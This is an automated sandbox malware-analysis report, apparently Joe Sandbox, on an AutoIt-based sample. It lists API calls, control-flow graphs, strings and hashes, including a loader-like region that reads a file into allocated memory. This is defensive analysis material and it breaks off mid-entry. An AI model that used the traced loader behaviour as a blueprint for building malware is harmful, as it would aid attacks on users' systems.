                                                          • Instruction ID: 4652b29cb5ca71d7e33490bae53b8fbf11b6f7bd20c2cfa66235d067333820af
                                                          • Opcode Fuzzy Hash: b11cd91aebe7ce64f27b304e8c2a7fa6f62be64bb836472c43b77f71018249a8
                                                          • Instruction Fuzzy Hash: 17B2C070608741DFD73ADF24C884BAAB7E4FF86304F15891DE4999B2A1CB75E844CB92

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003C8F5F: __time64.LIBCMT ref: 003C8F69
                                                            • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                          • __wsplitpath.LIBCMT ref: 003C9234
                                                            • Part of subcall function 003840FB: __wsplitpath_helper.LIBCMT ref: 0038413B
                                                          • _wcscpy.LIBCMT ref: 003C9247
                                                          • _wcscat.LIBCMT ref: 003C925A
                                                          • __wsplitpath.LIBCMT ref: 003C927F
                                                          • _wcscat.LIBCMT ref: 003C9295
                                                          • _wcscat.LIBCMT ref: 003C92A8
                                                            • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FDE
                                                            • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FED
                                                          • _wcscmp.LIBCMT ref: 003C91EF
                                                            • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
                                                            • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C9452
                                                          • _wcsncpy.LIBCMT ref: 003C94C5
                                                          • DeleteFileW.KERNEL32(?,?), ref: 003C94FB
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C9511
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9522
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9534
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 16a42f4349dd00d1ded853d429d3d0b09abe873e9988f78bb338d2074b5a0819
                                                          • Instruction ID: 9b156f3ba1a701b30a30a6a832e40f11cf0e5b6184617a5f3fb643c380d86c45
                                                          • Opcode Fuzzy Hash: 16a42f4349dd00d1ded853d429d3d0b09abe873e9988f78bb338d2074b5a0819
                                                          • Instruction Fuzzy Hash: 32C12AB1D00219AADF22DF95CC85FDEBBBDAF45310F0044AAF609EA151DB309E448F65

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                          • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                          • LoadIconW.USER32(000000A9), ref: 003630F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                          • Instruction ID: 143c8d3253955d3489b7f89cb32abd473717c9681cbb89b4750b18f213aa4bf6
                                                          • Opcode Fuzzy Hash: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                          • Instruction Fuzzy Hash: ED3149B1940349EFDB619FA4D885AD9BBF4FB09310F10426AE580EA2A0D3F50596CF64

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                          • LoadIconW.USER32(00000063), ref: 00363A76
                                                          • LoadIconW.USER32(000000A4), ref: 00363A88
                                                          • LoadIconW.USER32(000000A2), ref: 00363A9A
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                          • RegisterClassExW.USER32(?), ref: 00363B16
                                                            • Part of subcall function 00363041: GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                            • Part of subcall function 00363041: RegisterClassExW.USER32(00000030), ref: 0036309E
                                                            • Part of subcall function 00363041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                            • Part of subcall function 00363041: InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                            • Part of subcall function 00363041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                            • Part of subcall function 00363041: LoadIconW.USER32(000000A9), ref: 003630F2
                                                            • Part of subcall function 00363041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$8]$AutoIt v3
                                                          • API String ID: 423443420-3199686076
                                                          • Opcode ID: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                          • Instruction ID: fc92b9fb9fcbad9a3aa38efdc8146e895de4a2c62bbea1524ffcbc1025864964
                                                          • Opcode Fuzzy Hash: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                          • Instruction Fuzzy Hash: CC215E74E00304EFEB21DFA4EC49BAD7BB4FB08711F4041AAF500AA2E1D3B556518FA8

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                          • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                          • LoadIconW.USER32(000000A9), ref: 003630F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                          • Instruction ID: a83a36bf51d28092fd6566a0540cdcc40262a56a6003091d2b2b91a10404afca
                                                          • Opcode Fuzzy Hash: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                          • Instruction Fuzzy Hash: AB21FCB1A01258EFDB21DF94EC88BDD7BF8FB08710F00422AF510AA2A0D7F145558F95

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00364706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004252F8,?,003637AE,?), ref: 00364724
                                                            • Part of subcall function 0038050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00367165), ref: 0038052D
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003671A8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0039E8C8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0039E909
                                                          • RegCloseKey.ADVAPI32(?), ref: 0039E947
                                                          • _wcscat.LIBCMT ref: 0039E9A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: ba89680d379d32e3a486e4d5ba5581a965b4dfab2a8585ec3deac6526a074b6b
                                                          • Instruction ID: 465104c37e8d7e4eedc0f4df5c775388c764b367aeb8a2f414afa7b227ff04b5
                                                          • Opcode Fuzzy Hash: ba89680d379d32e3a486e4d5ba5581a965b4dfab2a8585ec3deac6526a074b6b
                                                          • Instruction Fuzzy Hash: 04719E71608301DEC716EF25E8819ABBBE8FF84310F81497EF4458B1A0EB709949CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 767 363633-363681 769 363683-363686 767->769 770 3636e1-3636e3 767->770 772 3636e7 769->772 773 363688-36368f 769->773 770->769 771 3636e5 770->771 774 3636ca-3636d2 DefWindowProcW 771->774 775 39d0cc-39d0fa call 371070 call 371093 772->775 776 3636ed-3636f0 772->776 777 363695-36369a 773->777 778 36374b-363753 PostQuitMessage 773->778 785 3636d8-3636de 774->785 814 39d0ff-39d106 775->814 779 363715-36373c SetTimer RegisterWindowMessageW 776->779 780 3636f2-3636f3 776->780 782 3636a0-3636a2 777->782 783 39d154-39d168 call 3c2527 777->783 784 363711-363713 778->784 779->784 789 36373e-363749 CreatePopupMenu 779->789 786 39d06f-39d072 780->786 787 3636f9-36370c KillTimer call 36443a call 363114 780->787 790 363755-36375f call 3644a0 782->790 791 3636a8-3636ad 782->791 783->784 808 39d16e 783->808 784->785 793 39d0a8-39d0c7 MoveWindow 786->793 794 39d074-39d076 786->794 787->784 789->784 809 363764 790->809 797 39d139-39d140 791->797 798 3636b3-3636b8 791->798 793->784 801 39d078-39d07b 794->801 802 39d097-39d0a3 SetFocus 794->802 797->774 804 39d146-39d14f call 3b7c36 797->804 806 3636be-3636c4 798->806 807 39d124-39d134 call 3c2d36 798->807 801->806 810 39d081-39d092 call 371070 801->810 802->784 804->774 806->774 806->814 807->784 808->774 809->784 810->784 814->774 818 39d10c-39d11f call 36443a call 36434a 814->818 818->774
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003636D2
                                                          • KillTimer.USER32(?,00000001), ref: 003636FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0036372A
                                                          • CreatePopupMenu.USER32 ref: 0036373E
                                                          • PostQuitMessage.USER32(00000000), ref: 0036374D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated$%?
                                                          • API String ID: 129472671-4267315211
                                                          • Opcode ID: 35ae6c5a70dd0119b869c6814ee630708d04a03d98cc6c36d59ef27dca5c6525
                                                          • Instruction ID: 849c0b9f61bea13db480f04c8b2583559200590866e0c977d6d6ba67b42f44ed
                                                          • Opcode Fuzzy Hash: 35ae6c5a70dd0119b869c6814ee630708d04a03d98cc6c36d59ef27dca5c6525
                                                          • Instruction Fuzzy Hash: 3A4146B2300545BBDF336F28EC8AB793B58EB01300F948135F5029A2E9CAB49E519779

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RB
                                                          • API String ID: 1825951767-219029296
                                                          • Opcode ID: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                          • Instruction ID: 0ed538ab04a73d891072ce89ba2e00ca2a7276d2f0c7ef3855ae583cb57c9ad9
                                                          • Opcode Fuzzy Hash: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                          • Instruction Fuzzy Hash: F5A16E7290022D9ACF16EBA0DC95AFEB778BF15310F40852AF415BB195DF745A08CB60

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                            • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                            • Part of subcall function 003760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0036F930), ref: 00376154
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0036F9CD
                                                          • OleInitialize.OLE32(00000000), ref: 0036FA4A
                                                          • CloseHandle.KERNEL32(00000000), ref: 003A45C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <WB$\TB$%?$SB
                                                          • API String ID: 1986988660-697478888
                                                          • Opcode ID: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                          • Instruction ID: 4c7b18dc296dc458e6f460f84dc2938dd7c0807612e78b3ab77756d5284a18e7
                                                          • Opcode Fuzzy Hash: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                          • Instruction Fuzzy Hash: 5D81ADB0B01A40DFC3A5EF29B945729BBE5FB983167D0813AD418CB261EBB44586CF19

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 983 e78ac8-e78b76 call e764c8 986 e78b7d-e78ba3 call e799d8 CreateFileW 983->986 989 e78ba5 986->989 990 e78baa-e78bba 986->990 991 e78cf5-e78cf9 989->991 998 e78bc1-e78bdb VirtualAlloc 990->998 999 e78bbc 990->999 992 e78d3b-e78d3e 991->992 993 e78cfb-e78cff 991->993 995 e78d41-e78d48 992->995 996 e78d01-e78d04 993->996 997 e78d0b-e78d0f 993->997 1002 e78d9d-e78db2 995->1002 1003 e78d4a-e78d55 995->1003 996->997 1004 e78d11-e78d1b 997->1004 1005 e78d1f-e78d23 997->1005 1000 e78be2-e78bf9 ReadFile 998->1000 1001 e78bdd 998->1001 999->991 1006 e78c00-e78c40 VirtualAlloc 1000->1006 1007 e78bfb 1000->1007 1001->991 1010 e78db4-e78dbf VirtualFree 1002->1010 1011 e78dc2-e78dca 1002->1011 1008 e78d57 1003->1008 1009 e78d59-e78d65 1003->1009 1004->1005 1012 e78d25-e78d2f 1005->1012 1013 e78d33 1005->1013 1014 e78c47-e78c62 call e79c28 1006->1014 1015 e78c42 1006->1015 1007->991 1008->1002 1016 e78d67-e78d77 1009->1016 1017 e78d79-e78d85 1009->1017 1010->1011 1012->1013 1013->992 1023 e78c6d-e78c77 1014->1023 1015->991 1019 e78d9b 1016->1019 1020 e78d87-e78d90 1017->1020 1021 e78d92-e78d98 1017->1021 1019->995 1020->1019 1021->1019 1024 e78caa-e78cbe call e79a38 1023->1024 1025 e78c79-e78ca8 call e79c28 1023->1025 1030 e78cc2-e78cc6 1024->1030 1031 e78cc0 1024->1031 1025->1023 1033 e78cd2-e78cd6 1030->1033 1034 e78cc8-e78ccc CloseHandle 1030->1034 1031->991 1035 e78ce6-e78cef 1033->1035 1036 e78cd8-e78ce3 VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E78B99
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E78DBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                          • Instruction ID: 25c03d8cc6147b443a7d957cc8847a85c5db61433ace00e310e688b49cdea95a
                                                          • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                          • Instruction Fuzzy Hash: 90A14970E40209EBDB14CFA4C998BEEBBB5FF58304F209559E605BB280DB759A40CF65

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1114 3639d5-363a45 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                          • Instruction ID: 49c78bc4eec7e1a72a358853faa8de252a036114c085a0840924e96ff3abe3c7
                                                          • Opcode Fuzzy Hash: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                          • Instruction Fuzzy Hash: 7FF03A706002A0BEEA3157236C48E7B2E7DD7C6F60F4001BAB900E61F0C2B10842CEB4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1467 e78878-e789bc call e764c8 call e78768 CreateFileW 1474 e789c3-e789d3 1467->1474 1475 e789be 1467->1475 1478 e789d5 1474->1478 1479 e789da-e789f4 VirtualAlloc 1474->1479 1476 e78a73-e78a78 1475->1476 1478->1476 1480 e789f6 1479->1480 1481 e789f8-e78a0f ReadFile 1479->1481 1480->1476 1482 e78a13-e78a4d call e787a8 call e77768 1481->1482 1483 e78a11 1481->1483 1488 e78a4f-e78a64 call e787f8 1482->1488 1489 e78a69-e78a71 ExitProcess 1482->1489 1483->1476 1488->1489 1489->1476
                                                          APIs
                                                            • Part of subcall function 00E78768: Sleep.KERNELBASE(000001F4), ref: 00E78779
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E789B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: RDLU1J3NPNTCYN3TEENNOEFQ50YHL
                                                          • API String ID: 2694422964-1661741281
                                                          • Opcode ID: 7322594a95749a70dcad5d28f1a76852be4af8685717d9a387dcdc563173f2ca
                                                          • Instruction ID: 26a778ac2523d4a657c1ea98deddd90cb8610a3edf92b1c9a23ab8871be4346a
                                                          • Opcode Fuzzy Hash: 7322594a95749a70dcad5d28f1a76852be4af8685717d9a387dcdc563173f2ca
                                                          • Instruction Fuzzy Hash: 2D617370D04288DAEF11DBF4C958BEEBBB4AF15304F144199E6497B2C1D7B90B48CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1491 36407c-364092 1492 36416f-364173 1491->1492 1493 364098-3640ad call 367a16 1491->1493 1496 39d3c8-39d3d7 LoadStringW 1493->1496 1497 3640b3-3640d3 call 367bcc 1493->1497 1499 39d3e2-39d3fa call 367b2e call 366fe3 1496->1499 1497->1499 1501 3640d9-3640dd 1497->1501 1509 3640ed-36416a call 382de0 call 36454e call 382dbc Shell_NotifyIconW call 365904 1499->1509 1513 39d400-39d41e call 367cab call 366fe3 call 367cab 1499->1513 1503 364174-36417d call 368047 1501->1503 1504 3640e3-3640e8 call 367b2e 1501->1504 1503->1509 1504->1509 1509->1492 1513->1509
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039D3D7
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          • _memset.LIBCMT ref: 003640FC
                                                          • _wcscpy.LIBCMT ref: 00364150
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
                                                          • Instruction ID: bce2b2df68524a99e2d837ed313c8577dff3934343ac58e7f738685b585ddc33
